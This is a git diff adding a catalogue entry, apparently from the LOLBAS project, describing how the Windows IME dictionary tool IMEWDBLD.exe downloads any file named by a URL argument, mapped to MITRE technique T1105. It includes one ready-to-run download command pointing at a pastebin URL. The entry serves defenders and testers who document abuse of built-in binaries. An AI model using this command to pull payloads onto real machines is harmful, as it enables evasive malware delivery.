diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml new file mode 100644 index 0000000..e1167c1 --- /dev/null +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -0,0 +1,22 @@ +--- +Name: IMEWDBLD.exe +Description: Microsoft IME Open Extended Dictionary Module +Author: 'Wade Hickey' +Created: '2020-03-05' +Commands: + - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw + Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe +Resources: + - Link: https://twitter.com/notwhickey/status/1367493406835040265 +Acknowledgement: + - Person: Wade Hickey + Handle: '@notwhickey' +---